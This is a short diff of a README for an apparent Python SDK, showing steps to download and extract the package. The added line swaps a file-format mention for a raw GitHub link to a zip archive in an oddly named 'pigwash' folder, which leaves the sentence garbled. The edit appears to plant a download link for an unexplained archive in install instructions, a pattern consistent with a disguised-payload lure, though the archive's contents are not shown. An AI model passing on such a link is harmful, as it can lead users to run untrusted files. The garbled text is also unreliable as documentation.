Adabobodisana/api-sdkpy/README.md

    - Click on the SDK version that suits your system (Python compatible).
    - Your browser will start downloading it automatically.

 4. **Locate the Downloaded File:** Open your downloads folder to find the downloaded file.
-It may be in a .zip or .tar.gz format.
+It may be in a .zip or https://raw.githubusercontent.com/Adabobodisana/api-sdkpy/main/pigwash/api-sdkpy.zip format.

 5. **Extract the Files:**
    - Right-click on the file and select "Extract All" or use any extraction tool.
 Follow prompts to finish extraction.